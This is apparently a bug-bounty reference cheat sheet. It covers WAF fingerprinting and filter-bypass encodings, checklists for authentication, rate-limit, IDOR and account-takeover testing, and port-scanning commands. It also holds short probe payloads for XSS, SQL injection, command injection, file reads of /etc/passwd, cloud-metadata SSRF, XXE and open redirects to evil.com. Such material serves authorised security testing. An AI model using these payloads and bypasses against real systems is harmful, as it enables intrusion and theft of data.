Quick Reference & Cheatsheets

🛡️ WAF Fingerprinting

Identify Web Application Firewalls to understand filtering and develop bypass strategies.

Detection Tools

                # Automated WAF detection
wafw00f https://target.com
nmap -p 443 --script=http-waf-detect target.com
whatwaf -u https://target.com
            

Common WAF Indicators

WAF	Detection Method
Cloudflare	Server: cloudflare, __cfduid cookie, cf-ray header
AWS WAF	Server: awselb/2.0, x-amzn-* headers
Akamai	AkamaiGHost errors, X-Akamai-* headers
Imperva	visid_incap_ cookie, X-CDN: Incapsula
ModSecurity	406 Not Acceptable, Mod_Security messages
Sucuri	sucuri-block.css, X-Sucuri-* headers
F5 BIG-IP	BigIP* cookies, X-WA-Info header

Bypass Techniques

                # Case manipulation
<ScRiPt>alert(1)</sCrIpT>

# URL encoding
%3Cscript%3Ealert(1)%3C/script%3E

# Double encoding
%253Cscript%253E

# Unicode encoding
\u003cscript\u003e

# HTML entity encoding
<script>

# NULL byte
%00<script>alert(1)</script>

# Newline/CRLF injection
%0a%0d<script>alert(1)</script>
            

📊 HTTP Status Codes Reference

2xx Success

Code	Meaning	Bug Hunting Relevance
200	OK	Successful request - check response body for data leaks
201	Created	Resource created - test for privilege escalation
204	No Content	Success but no body - blind vulnerabilities possible

3xx Redirection

Code	Meaning	Bug Hunting Relevance
301	Moved Permanently	Check Location header for open redirects
302	Found	Temporary redirect - test for open redirect
307	Temporary Redirect	Preserves request method - test method-based bypasses

4xx Client Errors

Code	Meaning	Bug Hunting Relevance
400	Bad Request	Malformed request - potential injection point
401	Unauthorized	Test for auth bypass, broken authentication
403	Forbidden	Access denied - test for authorization bypass
404	Not Found	May still process requests - blind vulnerabilities
405	Method Not Allowed	Try different HTTP methods (PUT, DELETE, PATCH)
429	Too Many Requests	Rate limit hit - test for bypass techniques

5xx Server Errors

Code	Meaning	Bug Hunting Relevance
500	Internal Server Error	Server crash - check error messages for info disclosure
502	Bad Gateway	Proxy error - potential for SSRF
503	Service Unavailable	DoS condition or maintenance - test availability

🔐 Authentication Testing Checklist

Comprehensive checklist for testing authentication mechanisms.

Test for default credentials (admin/admin, admin/password)

Check password policy - minimum length, complexity requirements

Test for username enumeration via login error messages

Verify brute force protection - rate limiting, account lockout

Test password reset mechanism for token predictability

Check for password reset link expiration

Test for session fixation vulnerabilities

Verify session tokens are invalidated on logout

Test for concurrent session handling

Check session timeout configuration

Test JWT token validation - algorithm, signature, expiration

Verify secure cookie flags (HttpOnly, Secure, SameSite)

Test 2FA implementation for bypass vulnerabilities

Check for response manipulation during 2FA

Test OAuth flow for open redirects and token leakage

Verify CAPTCHA implementation and bypass potential

Test for SQL injection in login forms

Check for timing attacks on authentication

⏱️ Rate Limit Testing Checklist

Test for rate limiting and bypass techniques.

Test for IP-based rate limiting

Try using X-Forwarded-For header to bypass IP limits

Test with X-Originating-IP, X-Remote-IP headers

Change user agent on each request

Rotate through multiple proxies/VPNs

Test different HTTP methods (GET vs POST)

Try adding null bytes (%00) to parameters

Test case sensitivity in endpoints (/API vs /api)

Add trailing slashes or extra path segments

Test with different Content-Type headers

Use race conditions to bypass limits

Test API versioning bypass (/v1/ vs /v2/)

🔓 IDOR Testing Checklist

Insecure Direct Object Reference testing methodology.

Test numeric IDs sequentially (1, 2, 3, 100, 1000)

Try UUID/GUID manipulation

Test with different HTTP methods (GET, POST, PUT, DELETE)

Check for encoded IDs (base64, hex)

Test parameter pollution (id=1&id=2)

Try array notation (id[]=1&id[]=2)

Test JSON array in request body

Check for wildcard or * as ID value

Test negative IDs (-1, -100)

Try very large numbers (999999999)

Test with different user roles/privileges

Check response for other users' data even if access denied

Test bulk operations for batch IDOR

Look for predictable patterns in IDs

👤 Account Takeover Checklist

Testing for account takeover vulnerabilities.

Test password reset token for predictability

Check if reset tokens expire properly

Test for password reset token leakage in Referer

Try host header injection in password reset

Test email parameter manipulation (victim@email.com)

Check for response manipulation in 2FA

Test 2FA code reusability

Try brute force on 2FA codes (rate limit testing)

Test for session fixation during login

Check OAuth redirect_uri validation

Test for open redirect in OAuth flow

Try JWT token manipulation (alg: none)

Test for CSRF on email change functionality

Check for CSRF on password change

Test race condition in signup/verification

🔌 Common Ports & Services

Port	Service	What to Test
21	FTP	Anonymous login, weak credentials, directory traversal
22	SSH	Weak credentials, outdated versions, user enumeration
23	Telnet	Unencrypted, default credentials
25	SMTP	Email spoofing, open relay, user enumeration
53	DNS	Zone transfer, DNS cache poisoning, subdomain brute force
80	HTTP	Web vulnerabilities, information disclosure
443	HTTPS	SSL/TLS issues, web vulnerabilities, certificate validation
3306	MySQL	Default credentials, SQL injection, remote access
3389	RDP	Weak credentials, BlueKeep vulnerability, session hijacking
5432	PostgreSQL	Default credentials, SQL injection, remote access
6379	Redis	No authentication, SSRF, RCE via EVAL
8080	HTTP Proxy	Open proxy, web admin panels, management interfaces
8443	HTTPS Alt	Web vulnerabilities on alternate port
9200	Elasticsearch	Unauthenticated access, data exposure, RCE
27017	MongoDB	No authentication, data exposure, NoSQL injection

Port Scanning Commands

                # Fast scan of common ports
nmap -F target.com

# Service version detection
nmap -sV -p- target.com

# Comprehensive scan with NSE scripts
nmap -sC -sV -p- -T4 target.com -oA scan-results

# Using masscan for speed
masscan -p1-65535 target.com --rate=1000

# Using naabu (fast)
naabu -host target.com -top-ports 1000

# Specific port scan
nmap -p 80,443,8080,8443 target.com
            

⚡ Quick Payload Reference

XSS Quick Test

                <script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
javascript:alert(1)
            

SQLi Quick Test

                ' OR '1'='1
' OR 1=1--
" OR "1"="1
admin'--
' UNION SELECT NULL--
            

Command Injection Quick Test

                ; whoami
| whoami
&& whoami
`whoami`
$(whoami)
            

LFI Quick Test

                ../../../etc/passwd
....//....//....//etc/passwd
..%2F..%2F..%2Fetc%2Fpasswd
php://filter/convert.base64-encode/resource=index.php
            

SSRF Quick Test

                http://127.0.0.1
http://localhost
http://169.254.169.254/latest/meta-data/
http://0.0.0.0
http://[::1]
            

Open Redirect Quick Test

                ?redirect=https://evil.com
?url=//evil.com
?next=https://evil.com
?return=//evil.com
            

XXE Quick Test

                <?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<root>&test;</root>
            

💡 Quick Bug Hunting Tips

Always check different HTTP methods - GET, POST, PUT, DELETE, PATCH, OPTIONS
Test both authenticated and unauthenticated - Many bugs only appear in one state
Read JavaScript files thoroughly - They contain endpoints, logic, and secrets
Check mobile APIs separately - Often have different security controls
Test edge cases - Negative numbers, very large values, special characters
Chain vulnerabilities - Low-severity bugs can combine for critical impact
Document everything - You'll forget details if you don't write them down

📝 Quick Reference & Cheatsheets